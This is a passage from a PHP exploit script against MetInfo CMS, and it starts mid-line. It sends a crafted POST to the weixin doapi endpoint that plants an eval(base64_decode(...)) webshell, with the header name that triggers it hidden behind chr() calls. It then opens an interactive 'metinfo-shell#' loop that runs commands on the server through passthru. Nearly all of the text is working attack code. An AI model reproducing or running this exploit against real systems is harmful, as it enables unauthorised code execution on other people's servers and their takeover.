\n\n"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$argv[1]}app/system/entrance.php?n=include&m=module&c=weixin&a=doapi"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); //curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080"); print "\n[+] Injecting PHP webshell\n"; $payload = 'eventSCANadminlogin&../config/tables{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}.{${die()}}'; curl_setopt($ch, CURLOPT_POSTFIELDS, $payload); if (!preg_match("/success/", curl_exec($ch))) die("[-] Injection failed!\n\n"); print "[+] Launching webshell\n"; $phpcode = "chdir('../..'); print '_____'; passthru(base64_decode('%s')); print '_____';"; $payload = 'eventSCANadminlogin&Array'; curl_setopt($ch, CURLOPT_POSTFIELDS, $payload); while(1) { print "\nmetinfo-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]); preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n"); }